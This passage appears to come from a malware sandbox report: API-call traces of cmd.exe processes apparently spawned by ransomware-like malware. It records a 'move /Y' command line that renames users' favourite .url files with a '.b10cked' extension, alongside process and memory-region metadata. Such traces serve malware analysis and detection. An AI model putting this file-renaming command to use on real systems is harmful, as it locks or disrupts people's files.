LCType=0x23, lpLCData=0x20f690, cchData=128 | out: lpLCData="0") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f690, cchData=128 | out: lpLCData="0") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f690, cchData=128 | out: lpLCData="1") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.694] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.695] GetConsoleTitleW (in: lpConsoleTitle=0x220910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.695] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.695] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.695] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.696] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.696] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.696] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.696] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.696] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.696] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.696] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0213.699] GetConsoleTitleW (in: lpConsoleTitle=0x20f388, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.699] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0213.699] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0213.699] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0213.699] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0213.699] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0213.699] _wcsicmp (_String1="move", _String2="CD") returned 10 [0213.699] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0213.699] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="REN") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0213.699] _wcsicmp (_String1="move", _String2="SET") returned -6 [0213.699] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0213.699] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0213.699] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0213.699] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0213.699] _wcsicmp (_String1="move", _String2="MD") returned 11 [0213.699] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0213.699] _wcsicmp (_String1="move", _String2="RD") returned -5 [0213.699] _wcsicmp (_String1="move", 
_String2="RMDIR") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0213.699] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0213.699] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0213.700] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0213.700] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0213.700] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0213.700] _wcsicmp (_String1="move", _String2="VER") returned -9 [0213.700] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0213.700] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0213.700] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0213.700] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0213.700] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0213.700] _wcsicmp (_String1="move", _String2="START") returned -6 [0213.700] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0213.700] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0213.700] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0213.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.702] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f144, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f13c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f13c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) 
returned 3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0213.702] 
_wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0213.703] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0213.703] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0213.703] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2=".") returned 59 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2="..") returned 59 [0213.703] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\iesite~1.url")) returned 0x20 [0213.703] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x231eb0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.703] SetErrorMode (uMode=0x0) returned 0x0 [0213.703] SetErrorMode (uMode=0x1) returned 0x0 [0213.703] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", nBufferLength=0x104, lpBuffer=0x20eacc, lpFilePart=0x20eab4 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", lpFilePart=0x20eab4*="IESITE~1.URL") returned 0x2f [0213.703] SetErrorMode (uMode=0x0) returned 0x1 [0213.703] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2=".") returned 59 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2="..") returned 59 [0213.704] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\iesite~1.url")) returned 0x20 [0213.704] 
SetErrorMode (uMode=0x0) returned 0x0 [0213.704] SetErrorMode (uMode=0x1) returned 0x0 [0213.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", nBufferLength=0x104, lpBuffer=0x20ef48, lpFilePart=0x20ece0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", lpFilePart=0x20ece0*="IESITE~1.URL") returned 0x2f [0213.704] SetErrorMode (uMode=0x0) returned 0x1 [0213.704] SetErrorMode (uMode=0x0) returned 0x0 [0213.704] SetErrorMode (uMode=0x1) returned 0x0 [0213.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f150, lpFilePart=0x20ece0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", lpFilePart=0x20ece0*="IE site on Microsoft.com.url.b10cked") returned 0x47 [0213.704] SetErrorMode (uMode=0x0) returned 0x1 [0213.704] SetLastError (dwErrCode=0x0) [0213.704] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url.b10cked")) returned 0xffffffff [0213.704] GetLastError () returned 0x2 [0213.704] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", fInfoLevelId=0x1, lpFindFileData=0x20e65c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e65c) returned 0x220f28 [0213.704] FindNextFileW (in: hFindFile=0x220f28, lpFindFileData=0x20e65c | out: lpFindFileData=0x20e65c) returned 0 [0213.705] GetLastError () returned 0x12 [0213.705] FindClose (in: hFindFile=0x220f28 | out: hFindFile=0x220f28) returned 1 [0213.706] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", fInfoLevelId=0x1, lpFindFileData=0x231c50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x231c50) returned 0x220f28 [0213.706] 
GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", nBufferLength=0x104, lpBuffer=0x20e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", lpFilePart=0x0) returned 0x47 [0213.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url", nBufferLength=0x104, lpBuffer=0x20e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url", lpFilePart=0x0) returned 0x3f [0213.706] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url")) returned 0x20 [0213.706] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url.b10cked"), dwFlags=0x3) returned 1 [0214.044] FindClose (in: hFindFile=0x220f28 | out: hFindFile=0x220f28) returned 1 [0214.045] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e8a8 | out: _Buffer=" 1") returned 9 [0214.045] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.045] GetFileType (hFile=0x7) returned 0x2 [0214.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.045] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e834 | out: lpMode=0x20e834) returned 1 [0214.045] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e868 | out: lpConsoleScreenBufferInfo=0x20e868) returned 1 [0214.045] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 
lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.046] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e8a8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.046] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e88c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e88c*=0x1a) returned 1 [0214.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.046] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.046] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.046] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.046] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.047] SetConsoleInputExeNameW () returned 0x1 [0214.047] GetConsoleOutputCP () returned 0x1b5 [0214.047] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.047] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.047] exit (_Code=0) Process: id = "525" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16800" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31399 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31400 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31401 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31402 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31403 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31404 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31405 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31406 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31407 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31408 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31579 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31580 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31581 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31582 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 31583 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 31584 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31585 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31586 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31587 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31588 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31589 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 
0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31590 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31591 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31592 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31593 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 31594 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31595 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31596 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31597 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31598 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31599 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31600 start_va = 
0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 31601 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 31602 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 726 os_tid = 0xdec [0213.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fdcc | out: lpSystemTimeAsFileTime=0x20fdcc*(dwLowDateTime=0xb44ce540, dwHighDateTime=0x1d440a9)) [0213.914] GetCurrentProcessId () returned 0x998 [0213.914] GetCurrentThreadId () returned 0xdec [0213.914] GetTickCount () returned 0x3bedb [0213.914] QueryPerformanceCounter (in: lpPerformanceCount=0x20fdc4 | out: lpPerformanceCount=0x20fdc4*=27070355512) returned 1 [0213.915] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.915] __set_app_type (_Type=0x1) [0213.915] __p__fmode () returned 0x76b331f4 [0213.915] __p__commode () returned 0x76b331fc [0213.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.916] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.916] GetCurrentThreadId () returned 0xdec [0213.916] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdec) returned 0x38 [0213.916] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.916] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.916] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.916] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.916] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fd5c | out: phkResult=0x20fd5c*=0x0) returned 0x2 [0213.916] VirtualQuery (in: lpAddress=0x20fd93, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.916] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.916] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.917] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.917] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.917] GetConsoleOutputCP () returned 0x1b5 [0213.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.917] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.917] _get_osfhandle (_FileHandle=1) returned 0x7 
[0213.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.918] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.918] GetEnvironmentStringsW () returned 0x3901b0* [0213.918] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0213.918] GetEnvironmentStringsW () returned 0x3901b0* [0213.919] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0213.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0xe8, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, 